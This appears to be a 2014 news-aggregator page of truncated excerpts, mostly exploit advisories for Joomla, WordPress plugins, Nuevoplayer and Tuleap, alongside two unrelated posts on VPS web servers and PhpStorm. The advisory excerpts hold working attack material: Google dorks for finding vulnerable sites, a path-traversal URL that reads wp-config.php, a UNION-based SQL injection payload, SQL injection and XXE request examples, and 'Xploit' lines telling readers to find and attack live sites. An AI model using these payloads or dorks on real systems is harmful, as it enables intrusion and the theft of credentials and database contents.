Joomla RD Download SQL Injection

31 October 2014 - Source: http://www.mondounix.com
#!/usr/bin/python
#
# Exploit Name: Joomla RD Download SQL Injection
#
# Version: Unknown
#
# Exploit discovered and written by Claudio Viviani
#
# Dork google 1:  inurl:index.php?option=com_rd_download
# Dork google 2:  inurl:/component/rd_download/
#
# Tested on BackBox 3.x
#
# http connection
import urllib, urllib2
# string manipulation
import re
# Errors management
import sys
# Args management
import optparse
 
# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url
 
banner = """
           _______                      __...

Installing an Apache+MySQL+PHP web server on a VPS (Debian)

31 October 2014 - Source: http://www.webinblack.net

VPSs (Virtual Private Servers) are becoming increasingly popular, partly because prices have become more competitive, and today they are a good low-cost hosting option (yes, WebInBlack is on a VPS too), alongside Cloud Servers (which can, however, be more expensive). The downside of VPSs is that they are not for beginners, that is, most...

NuevoLabs flash player for clipshare SQL Injection

29 October 2014 - Source: http://www.mondounix.com
Nuevolabs Nuevoplayer for clipshare SQL Injection
=======================================================================
 
:: ADVISORY SUMMARY ::
Title:     Nuevolabs Nuevoplayer for clipshare Sql Injection
Vendor:    NUEVOLABS (www.nuevolabs.com)
Product:   NUEVOPLAYER for clipshare
Credits:   Cory Marsh - protectlogic.com
Discovery: 2014-10-10
Release:   2014-10-28
 
Nuevoplayer is a popular flash video player with integration into multiple popular video sharing suites.  The most
notable is Clipshare (clip-share.com).  Nuevoplayer provides flash video playing capabilities to third party video 
sharing suites.
 
 
:: VULNERABILITY ::
Type:     SQL Injection and Privilege Escalation
Category: Remote
Severity:...

Tuleap 7.4.99.5 Remote Command Execution

29 October 2014 - Source: http://www.mondounix.com
Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap
CVE: CVE-2014-7178
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
Tuleap does not validate the syntax of the requests submitted to SVN handler pages in order to validate whether requests passed to the passthru() function are introducing any extra parameters that would be executed in the content of the application.
 
This vulnerability can be exploited by external attackers to introduce external commands into the workflow of the application that would execute them as shown on the attached Proof Of Concept code below.
 
After registering with the application...

Tuleap 7.2 XXE Injection

29 October 2014 - Source: http://www.mondounix.com
Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap
CVE: CVE-2014-7177
Vendor: Enalean
Product: Tuleap
Affected version: 7.2 and earlier
Fixed version: 7.4.99.5
Reported by: Jerzy Kramarz
 
Details:
 
Multiple XML External Entity Injection issues have been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as PoC to confirm the vulnerability.
 
Vulnerability 1:
 
1) Upload an XXE using the following request:
 
 
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0)...

Tuleap 7.4.99.5 Blind SQL Injection

29 October 2014 - Source: http://www.mondounix.com
Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
CVE: CVE-2014-7176
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections:
 
 
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
Host: 192.168.56.108
User-Agent:...

WordPress Download Manager Arbitrary File Download

28 October 2014 - Source: http://www.mondounix.com
# WordPress Download Manager Plugin - Arbitrary File Download
# CWE: CWE-98
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 25/10/2014
# Vendor Homepage: https://wordpress.org/plugins/download-manager/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: inurl:/plugins/download-manager/
 
# VUL: /views/file_download.php?fname=
 
 or:
 
 /file_download.php?fname=
 
# PoC : 
 
 http://WEBSITE/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php
 
 
# Xploit: Find one website with use /plugins/download-manager/ && ADD TO Link:/views/file_download.php?fname=../../wp-config.php

...

WordPress HTML5 / Flash Player SQL Injection

28 October 2014 - Source: http://www.mondounix.com
# WordPress HTML5 and Flash Player Plugin SQL Injection
# CWE: CWE-89
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 24/10/2014
# Vendor Homepage: https://wordpress.org/plugins/player/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: inurl: "Index of" +inurl:/wp-content/plugins/player/
 
# PoC : 
 
http://WEBSITE/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,table_name,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from information_schema.tables where table_schema=database()--
 
 
# Xploit: Are vulnerable sites that have...

PhpStorm 8 PHP editor

26 October 2014 - Source: http://www.tecnofonia.net
For every programmer, choosing a good IDE to write code in is one of the crucial decisions on which much of their productivity will depend. If you are a web developer, and in particular you program in PHP, one of the best editors you can currently find is certainly PhpStorm by JetBrains. With PhpStorm you get a complete and powerful development environment for writing your code, with

WordPress CP Multi View Event Calendar 1.01 SQL Injection

24 October 2014 - Source: http://www.mondounix.com
######################
 
# Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability
 
# Exploit Author : Claudio Viviani 
 
# Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip
 
# Date : 2014-10-23
 
# Tested on : Windows 7 / Mozilla Firefox
              Windows 7 / sqlmap (0.8-1)
              Linux / Mozilla Firefox
              Linux / sqlmap 1.0-dev-5b2ded0
 
######################
 
 
# Description
 
CP Multi View Event Calendar 1.01 suffers from an SQL injection vulnerability.
 
The calid variable is not sanitized.
 
######################
 
# PoC
 
http://localhost/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1...
